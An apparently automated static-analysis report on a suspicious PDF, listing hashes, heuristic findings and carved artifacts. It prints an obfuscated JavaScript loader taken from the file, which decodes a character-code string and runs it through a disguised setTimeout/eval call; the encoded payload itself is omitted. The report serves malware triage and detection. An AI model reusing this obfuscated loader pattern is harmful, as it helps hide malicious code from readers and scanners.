PDF static analysis report

Static analysis result for SHA-256 de8007f50ea5c469…

SUSPICIOUS

PDF

Size: 37.4 KB
Created: 2010-04-12 16:09:41 +04:00
Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org))
First seen: 2026-05-11
MD5: 9aae5427885fbce7152fa0c3501b59f6
SHA-1: 8cc5631b35d2d09c09ccc3ba3c7f60bffbd8649a
SHA-256: de8007f50ea5c46942fb88aab2bf1083777d381a2867fcebc565e1b5e171056e
Risk Score: 56

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action (low, 1 related finding): PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low): PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger (low): PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact (info): EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x7062 8330 bytes
SHA-256: 00bc08d61a1d3d6364214a463c84e2e47777e8854317124d74c4f35a19618595
First 1,000 lines of the extracted script
var AvVSJM1 = '[encoded string omitted]';
var YI7NER5GY = 229;
AvVSJM1 = AvVSJM1.replace(/[^0-9]/g,':');
xiTXKbYq = 'YI7NER5GY';
AvVSJM1 = AvVSJM1.replace(/::/g,'');
app.alert(AvVSJM1);
function S8WxrSAKxyq2 ( FuigsZiEIUxU, R72EBU5tsvxe ) { var FiW0O = new String();var E2UFc92VKB = new String();
DGhYa = FuigsZiEIUxU .split(':');
for(CZaMfya7 = 0; CZaMfya7 < DGhYa.length-1;CZaMfya7++) { PrfWaCgz= String['fromCharCode'](DGhYa[CZaMfya7] - R72EBU5tsvxe);;
E2UFc92VKB = E2UFc92VKB + PrfWaCgz;} return E2UFc92VKB;};
xiTXKbYq = S8WxrSAKxyq2(AvVSJM1,YI7NER5GY);
var DkwDSUnW = 'a';
var ROsjMTqP = 'u';
liliCc9X96Sq = app['set'+'TimeO' + ROsjMTqP +'t']("ev"+DkwDSUnW+"l(xiTXKbYq)", 1);
stream_001_off00007062.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x7062 4164 bytes
SHA-256: 4d8c1d022fcca69f1b2afe1664250312f1bc921ee80a0da68b26bd84f6daa001
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).